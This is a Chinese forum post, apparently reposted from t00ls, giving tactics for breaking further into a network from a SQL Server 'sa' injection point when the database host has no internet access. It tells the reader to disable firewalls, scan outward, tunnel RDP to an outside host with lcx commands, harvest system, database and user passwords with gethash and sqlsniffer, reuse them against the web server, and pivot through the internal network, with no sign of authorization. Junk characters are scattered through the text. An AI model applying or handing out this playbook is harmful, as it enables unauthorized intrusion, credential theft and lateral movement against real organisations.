当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。9 s+ m" D0 z- B% r
! j! R' x: x) B- A7 w
' G- w4 {) [" i6 L* P& t
7 c# Q1 A) H# s
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
2 o0 M' U w: L0 @+ S! K7 k0 j$ w7 {/ U7 D! W9 U Z6 N3 h
, G3 ^ h& A9 V' y$ @一、DB机有公网IP.
T6 v( R( }3 a! Y- i$ T
2 J5 E1 x2 O5 v2 u9 Q: h6 U1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
$ o y, H4 _7 }0 F2 N# G
, r$ a# J) i3 C& f7 S' i, D4 H
t: f& a4 o9 V8 D& e+ q2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
6 ]* n9 u9 f0 l1 p/ f) w, T( T+ N- P( I6 E( V7 Z* @
' o) k% V9 F U* k% K9 ]3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com) |/ `7 C$ X: Q1 \& L5 Q" b4 I# X
% b" u7 B! f( [2 T5 h5 X
% L |' T% c$ [. \4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
! {2 I0 q1 P, ?6 X( B) i8 x( q
; l0 ?% D1 k+ }8 P; \+ [
, i- Y* l2 L' i- a4 f1 W. n; U1 ]* b7 L6 H8 W3 O+ `% d
二、DB机只有内网IP+ b! i( D( g4 g$ l3 |
, `# I b- G) R* K+ u2 k1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.7 ] ?, n/ A F% I( f2 k
' D0 _& K, G" _3 J" o5 B
; D* u7 e, E3 n- A2:停掉防火墙和IP策略再从内往外扫描.
9 p+ l7 h' F1 K3 y t, l4 i+ I2 c# ^& a! G5 v% p$ v
/ n) g1 n0 c p3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
~1 b+ d; A( Q: i/ Q7 K8 |
/ o* n$ |2 u) M9 ^* I5 t B9 o3 y6 K( e! {. e) ?2 t/ Q
4:学会密码规律分析往往会有惊喜.
9 w) S6 p* x! t6 u3 h! j; t" x9 j
$ i$ x# V1 S8 I
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
; v# s. O Z' z2 f/ O
" w2 P& [. U' }8 h: F. p3 b- Q" r6 k" r0 N
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |